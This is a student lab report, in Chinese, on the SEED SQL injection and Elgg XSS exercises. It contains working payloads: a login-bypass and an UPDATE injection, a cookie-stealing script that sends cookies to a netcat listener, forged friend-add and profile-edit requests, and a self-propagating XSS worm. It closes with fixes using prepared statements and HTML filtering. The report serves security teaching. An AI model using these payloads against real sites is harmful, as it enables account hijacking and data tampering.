20232925 2023-2024-2 《网络与系统攻防技术》第十次作业

20232925 2023-2024-2 《网络攻防实践》实践十报告

1.实践内容

一、SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序，并将其托管在 三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色：管理员是特权角色，可以管理每个员工的个人资料信息。员工是一般角色，可以查看或更新自己的个人资料信息。完成以下任务：

熟悉SQL语句： 我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。

对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。

对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

SQL对抗：修复上述SQL注入攻击漏洞。

二、SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么，我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中，学生需要利用此漏洞对经过修改的Elgg发起XSS攻击，攻击的最终目的是在用户之间传播XSS蠕虫，这样，无论是谁查看的受感染用户个人资料都将被感染。

发布恶意消息，显示警报窗口：在您的Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看您的配置文件时，将执行JavaScript程序并显示一个警报窗口。

弹窗显示cookie信息：将cookie信息显示。

窃取受害者的cookies：将cookie发送给攻击者。

成为受害者的朋友：使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程。

修改受害者的信息：使用js程序使得受害者在访问Alice的页面时，资料无需干预却被修改。

编写XSS蠕虫。

对抗XSS攻击。

2.实践过程

2.1 SEED SQL注入攻击与防御实验

2.1.1 配置环境

首先需要安装并配置seed虚拟机，在下载后与此前一样用vmwork配置环境，然后安装vmwork tools，重启后界面如图一所示。

图一

2.1.2熟悉SQL语句

我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。
在SEED Ubuntu中输入命令mysql -u root -p，回车后会提示输入密码,默认密码是seedubuntu，然后会登录到数据库，如图二。

图二

然后输入sql的命令查询语句，先是输入“use Users;”切换到Users数据库，然后输入“show tables;”显示数据库中所有的表，再输入“select * from credential”读取选取的表中所有字段信息，如图三所示。

图三

2.1.3 对SELECT语句的SQL注入攻击：

上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。
首先上述使用的数据表是http://www.seedlabsqlinjection.com/使用的数据。再浏览器打开后输入任意用户名和密码，这里用的root/20232925cx。结果如图四所示。

图四

点击“F12”进入网页后台，选取“Network”后刷新网页，可以发现用户名和密码通过GET请求，这里再网页的URL包含的参数中也能看出，最终提交至unsafe_home.php页面进行身份检验，如图五所示。

图五

然后就是分析下unsafe_home.php的相关代码，在终端中使用命令vim /var/www/SQLInjection/unsafe_home.php浏览其代码，如图六所示。

图六

该库代码是在判断会话是否存在后创建链接，之后会定位到credential表，查找用户输入的用户名和密码组合是否存在。然后如果用户名是"admin"，那么会将用户的相关信息都会打印出来，生日邮箱地址等等。

图七

如此我们可以注入以下sql语句：

SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= 'Admin'#' and Password='$hashed_pwd'

"#"表示注释，所以我们只是确定用户名是admin即可，不用在意密码多少，就能进入管理员界面获取用户信息。返回登陆界面后输入用户名结果如图八。

图八

通过上述分析知我们此时把用户民换成获取到的用户名即能得到对应的用户信息。如图九。

图九

2.1.4 对UPDATE语句的SQL注入攻击

通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
在Alice信息界面点击“Edit Profile”,然后保存查看源码来确认数据是传入到哪个php代码中进行处理的。然后能看到是浏览器将修改后的数据传入unsafe_edit_backend.php进行处理，如图十。

图十

打开并分析unsafe_edit_backend.php的源码，使用命令vim /var/www/SQLInjection/unsafe_home.php。如图十一。

图十一

那么我们注入的语句如下：

UPDATE credential SET nickname='', salary='1111' where Name='Alice';#,email='$input_email',address='$input_address', Password='$hashed_pwd', PhoneNumber='$input_phonenumber' WHERE ID=$id;

这里实现的是将Alice的工资修改为1111，如图十二所示：

图十二

2.1.5 SQL对抗

修复上述SQL注入攻击漏洞。
SQL注入漏洞存在的原因是代码和数据没有隔离。例如此前我们用“#”对命令注释。
所以我们可以使用预处理语句阻止上面分析的两种SQL注入攻击。
对于unsafe_home.php，源代码为:

$sql = "SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= '$input_uname' and Password='$hashed_pwd'";

修改为:

$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?");
$sql->bind_param("ss", $input_uname, $hashed_pwd);

对于unsafe_edit_backend.php，源代码为:

$sql = "UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address',PhoneNumber='$input_phonenumber' where ID=$id;";

修改为:

$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);

2.2 SEED XSS跨站脚本攻击实验(Elgg)

2.2.1 发布恶意消息，显示警报窗口

在Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看配置文件时，将执行JavaScript程序并显示一个警报窗口。
编写脚本如下：

<script>alert("xss");</script>

在Alice的界面点击“Edit Profile”，在“Brief description”中写入上述脚本内容，如图十三。

图十三

如图十四所示，之后访问Alice的界面都会弹出警示窗口。

图十四

2.2.2 弹窗显示cookie信息

将cookie信息显示。
编写脚本如下：

<script> alert(document.cookie);</script>

同理修改“Brief description”为上述脚本。之后访问Alice的界面会将cookie信息显示，如图十五。

图十五

2.2.3 窃取受害者的cookies

将cookie发送给攻击者。
当JavaScript插入img标签时浏览器会从src字段中的URL加载img。
编写脚本如下：

<script>  document.write('<img src=http://127.0.0.1:5555?c=' + escape(document.cookie) + '>');
</script>

修改“Brief description”为上述脚本，打开一个终端并输入命令nc -l 5555 -v来监听5555端口，结果如图十六，当访问Alice主页时netcat就会接收到该用户的cookie。

图十六

2.2.4 成为受害者的朋友

使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程。
以用户 Alice 的身份访问用户 Boby 的主页，点击“Add Friend”按钮，我们进入网页后台分析，点击按钮后浏览器向http://www.xsslabelgg.com/action/friends/add发送了GET请求，并附带了三个参数，可以判断分别是添加好友ID，时间戳和令牌号。如图十七。

图十七 因此我们可以编写脚本如下:

<script type="text/javascript">
window.onload = function () {
   var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
   var token="&__elgg_token="+elgg.security.token.__elgg_token;
   var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44"+ts+token;
    
   var Ajax=null;    
   Ajax=new XMLHttpRequest();
   Ajax.open("GET",sendurl,true);
   Ajax.setRequestHeader("Host","www.xsslabelgg.com");
   Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
   Ajax.send();
}
</script>

然后在Alice的About Me一栏中先切换到Edit HTML，然后在文本框输入上述脚本，保存退出。如图十八所示。

图十八

切换到Boby，在没有添加Alice为好友的情况下访问Alice主页，在回到自己的profile能发现此时Alice被添加为了好友，如图十九所示。

图十九

2.2.5 修改受害者的信息

使用js程序使得受害者在访问Alice的页面时，资料无需干预却被修改。
编写脚本如下：

<script type="text/javascript">
	window.onload = function(){
  //JavaScript code to access user name, user guid, Time Stamp __elgg_ts
  //and Security Token __elgg_token
	var userName=elgg.session.user.name;
	var guid="&guid="+elgg.session.user.guid;
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;
    var content=token+ts+"name="+userName+"&description=<p>This have been cracked by alice.</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2"+guid;  
    var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
	var aliceGuid=44;    
	if(elgg.session.user.guid!=aliceGuid){
   	//Create and send Ajax request to modify profile
   	var Ajax=null;
   	Ajax=new XMLHttpRequest();
   	Ajax.open("POST",sendurl,true);
		Ajax.setRequestHeader("Host","www.xsslabelgg.com");
		Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    Ajax.send(content);
  }
}
</script>

同理编辑Alice的About me输入上述脚本，保存退出。如图二十所示。

图二十

切换用户Boby登录，当Boby的profile为空后访问Alice主页，此时返回自己的profile，发现About me已经被修改，如图二十一所示。

图二十一

2.2.6 编写XSS蠕虫。

编写XSS蠕虫脚本如下:

<script id="worm" type="text/javascript">
    window.onload = function(){
        var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
        var jsCode = document.getElementById("worm").innerHTML;
        var tailTag = "</" + "script>"; 
        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
 
        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
 
        //Construct the content of your url.
        var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack again "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        alert(content)
 
        var aliceGuid=44;
 
        if(elgg.session.user.guid!=aliceGuid){
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
            Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }
</script>

同理编辑Alice的About me输入上述脚本，保存退出。如图二十二所示。

图二十二

切换用户Boby登录，当Boby的profile为空后访问Alice主页，此时返回自己的profile，发现About me已经被修改，如图二十三所示。

图二十三

然后切换用户Admin登录，当Admin的profile为空后访问Boby主页，此时返回自己的profile，发现About me已经被修改，如图二十四所示。

图二十四

2.2.7 对抗XSS攻击。

登录管理员用户，在管理界面的Plugins中能看到许多插件，其中我们需要的插件是HTMLawed，HTMLawed在对用户的输入校验并且去除特定标签。我们点击插件左侧的Activate使其激活。如图图二十五所示。

图二十五

此时我们再次返回profile页面，可以发现XSS攻击已经失效，如图二十六所示。

图二十六

3.学习中遇到的问题及解决

• 问题1：在进行实验是发现当前版本Seed虚拟机环境不适配。
• 问题1解决方案：重新安装16版本Seed虚拟机。
• 问题2：在终端进行数据库命令操作时报错
• 问题2解决方案：语句后面需要加上分号，例如"use Users;"

4.实践总结

本次实验主要学习了SQL注入和XSS攻击的过程和原理，通过实践对web前端和后端的原理有了清晰认知，无论是前端还是后端都是用代码语言来编写的，当代码层次留有漏洞就会可能被利用。所以在编辑代码实现功能的同时，我们也要思考到安全层面。